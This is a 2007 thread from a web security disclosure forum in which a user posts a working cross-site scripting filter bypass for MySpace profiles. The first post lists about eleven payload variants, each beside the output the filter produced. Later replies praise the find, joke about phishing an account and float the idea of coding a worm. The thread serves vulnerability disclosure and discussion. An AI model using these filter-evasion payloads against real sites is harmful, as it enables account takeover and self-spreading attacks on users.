Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace (my turn)
Posted by: digi7al64
Date: January 06, 2007 08:08AM

Ok, with everyone going after Myspace at the moment I was feeling alittle left out. Anyways i haven't really had anytime until tonight to check out the site and see if it was still vunerable to the non-alpha-non-digit XSS vector spoilts that have been published.

Sadly, whilst those specific spoilts were patched, it wasn't actually fixed, it seems they still don't grasp the issues involved and therefore are still vunerable.

The code.
<body onload<scrip=alert('xss');>

The result
<body onload..=alert('xss');>

This should be nothing new to any of us, as, with the previous spoilt discovered by kuza55 I simply used their filters against them (and there are lots of them).

For some fun i decided to post the codes i was testing with (in order) so new users can see how perhaps we might go after something like this (originally i was going to go after an all browser spoilt and as you can see that with the first couple of codes i was focusing on getting the script tags to fire. However I then realised i could easily use what i was testing with the re-create the firefox 0 day. I then spent the next couple of efforts chasing my tail before i realised i already had it (my syntax was messy).

<scr<!--ipt-->alert('xss');>					..-->alert('xss');>

<scrip<scr<!--ipt-->alert('xss');>				<scrip..-->alert('xss');>

<script<scr<!--ipt-->alert('xss');>				<scrip..-->alert('xss');>

<scrip<scriptt-->lert('xss');>					<scrip..t-->lert('xss');>

<scrip<tscr<!--ipt-->lert('xss');>				..scr<!-- -->ipt-->lert('xss');>

<scrip<scrip<t>lert('xss');>					<scrip..>lert('xss');>

<body onload<scrip<t>lert('xss');</script>			<body onload..>lert('xss');..>

<body onload<scrip<t>=alert('xss');</script>			<body onload..>=alert('xss');..>

<body onload<scrip<t=alert('xss');</script>			<body onload..=alert('xss');..>

<body onload<scrip<t=alert('xss');>				<body onload..=alert('xss');>

<body onload<script=alert('xss');>				<body onload..=alert('xss');>

Hopefully myspace can patch this properly this time... If not i will be posting more spoilts for the site soon.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: eyeced
Date: January 06, 2007 08:29AM

Haha your turn! Well done, as RSnake mentioned before this could quite easily be solved by using a while loop to check the code before it is saved on the profile. I think myspace have pretty good XSS filters, whilst still managing to keep the functionality of the html tags they allow.

Nice work!

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: jungsonn
Date: January 06, 2007 08:57AM

Wow super!

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: bubbles
Date: January 06, 2007 03:48PM

Awesome find!

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: jungsonn
Date: January 07, 2007 10:29AM

Do we all get turns on MySpace? Alas, too lazy to even signup there ^^

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: bubbles
Date: January 09, 2007 09:50AM

Well considering how often XSS for myspace comes up, you could just phish yourself an account :)

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: jungsonn
Date: January 09, 2007 10:08AM

Yeah but, it's getting a little boring to me to hear about a XSS in MySpace, It's like an XSS in eBay or Yah!ho? dunno, old news. They just suck at being secure, Seems many do the work for the MySpace developers, My take on it is to let them figuring their own things out, and not the easy way.

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: xKraigx
Date: January 09, 2007 04:11PM

jungsonn Wrote:
-------------------------------------------------------
> Do we all get turns on MySpace? Alas, too lazy to
> even signup there ^^


ahaha this is SO true!

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: digi7al64
Date: January 09, 2007 04:46PM

jungsonn Wrote:
-------------------------------------------------------
Yeah but, it's getting a little boring to me to hear about a XSS in MySpace, It's like an XSS in eBay or Yah!ho? dunno, old news. They just suck at being secure, Seems many do the work for the MySpace developers, My take on it is to let them figuring their own things out, and not the easy way.


digi7al64 Wrote:
-------------------------------------------------------
lol. Personally as someone who dabbles in hacking/pen testing/code auditing etc i like to see how sites handle the development of their security modules when issues arise. ATM we have a perfect example of re-active security rather then pro-active security. This is why the non-alpha-non-digit XSS vector continues to work and will continue to work until they examine the issues of why it is happening.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/09/2007 04:50PM by digi7al64.

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: eyeced
Date: January 09, 2007 05:39PM

Ill be looking out for them patching it as i've just visited the ha.ckers.org homepage and the title is getting quite funny. Just one more find and we'll have MySpace 0-Day Again (Again (Again) (Again)) all from the same cause!

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: digi7al64
Date: January 09, 2007 06:06PM

Interestingly i have a few other vectors up my sleeve at this time.

However rather then release them all in one go, I will wait and see what happens and how the approach this particular fix... will they fix it properly or will they only address this particular vector?

Also i am sort of hoping (since they are the cleverest people) whether they will remove the .. altogether and thereby allow us to implement other attack methods (which is quite possible, they seemed determined to allow the onload tag to stay in place).

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: Spikeman
Date: January 10, 2007 03:01AM

Anyone wanna try coding a worm?

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: jungsonn
Date: January 10, 2007 04:23AM

About the while loops for the programmers like RSnake mentioned in his wit, isn't it a nice idea to write a while > foreach loop to poke with xss dorks at their filters? anyway, that's what I would do in such a case cause most from the above examples look like eachother ^^

Options: ReplyQuote
Re: Myspace (my turn)
Posted by: eyeced
Date: January 10, 2007 05:29AM

The fragmentation works again, with a little tweaking, but for now i can't see much point in using it as this method has the same outcome but with less effort.

Options: ReplyQuote


Sorry, only registered users may post in this forum.